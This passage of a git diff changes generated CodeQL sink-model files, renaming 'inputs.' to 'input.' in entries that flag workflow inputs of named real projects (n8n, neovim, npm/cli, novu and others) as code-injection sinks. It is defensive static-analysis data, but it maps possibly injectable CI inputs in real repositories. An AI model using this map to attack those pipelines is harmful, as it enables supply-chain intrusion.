@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.context", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.tags", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-name", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-uuid", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging-repo", "code-injection", "generated"] - - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging", "code-injection", "generated"] \ No newline at end of file + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "input.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml index f7aafb134559..e43a220a2780 100644 --- a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.test", "code-injection", "generated"] - - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index 6107ae0e57ce..dd20d3100794 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image-aio", "code-injection", "generated"] - - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image", "code-injection", "generated"] \ No newline at end of file + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 74e0182cc4f6..3b9777b3f3a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.amazonflag", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.magiskver", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.root", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.gapps", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.amazonflag", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.magiskver", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.root", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.gapps", "code-injection", "generated"] - - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.amazonflag", "code-injection", "generated"] + - 
["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 4bbd06a86f57..3561bd15c366 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "inputs.pr_number", "code-injection", "generated"] \ No newline at end of file + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 59bdab8f39ba..29da5a83b629 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "inputs.qt_backend", "code-injection", "generated"] \ No newline at end of file + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 6988e25d41c3..9b92197cf5d9 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.target_platform", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.fprime_location", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.default_target_ref", "code-injection", "generated"] - - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.target_repository", "code-injection", "generated"] \ No newline at end of file + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "input.target_repository", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index 3c025f59b787..cbed3964cffd 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "inputs.invoke_context_name", "code-injection", "generated"] \ No newline at end of file + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 5de0d170d40a..29b47c043360 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml 
@@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.with_default", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_optional", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_optional", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_required", "code-injection", "generated"] - - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_optional", "code-injection", "generated"] \ No newline at end of file + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.number_required", "code-injection", 
"generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "input.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 19d38d1241d1..3c406b3bc0e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "inputs.build_flags", "code-injection", "generated"] \ No newline at end of file + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index b1c787677a6b..3a94887f8ffb 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.custom_run_id", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.non_validator_mode", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_optimism_options", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.network", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_options", "code-injection", "generated"] - - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.cl_client", "code-injection", "generated"] \ No newline at end of file + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.cl_client", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 249c734f55bb..5198d5f418a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "inputs.agent_version", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "inputs.test_mode", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "inputs.agentVersion", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.dry-run", "code-injection", "generated"] - - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.prefix", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "input.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "input.prefix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index 46951b5436d9..e3694a389735 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "inputs.page", "code-injection", "generated"] - - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "inputs.agent-ref", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index cd1d0f318ef5..f6f33154581e 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.changelog_file", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.workflows", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.changelog_file", "code-injection", "generated"] - - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.release_type", "code-injection", "generated"] \ No newline at end of file + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "input.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 4055874a790f..34efc8414d89 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] - - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] \ No newline at end of file + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index bccd7271b08a..71866026ef91 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml 
@@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.dry_run", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] - - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] \ No newline at end of file + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", 
"input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "input.dry_run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 56528159143a..83d241d21c0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.shard", "code-injection", "generated"] - - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.db", "code-injection", "generated"] \ No newline at end of file + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index c4a9b07ed997..3021de125684 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml 
@@ -3,18 +3,18 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.docker_image", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.terraform_workspace", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_hubspot_embed", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_mail_server_domain", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_widget_embed_path", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] - - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] - - 
["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] \ No newline at end of file + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_ws_url", "code-injection", "generated"] + - 
["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "input.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index db4f26083a0f..d2cb1da1e9fd 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c12a079e2e21..c551a135a142 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.npmVersion", "code-injection", "generated"] - - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.nodeVersion", "code-injection", "generated"] \ No newline at end of file + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git 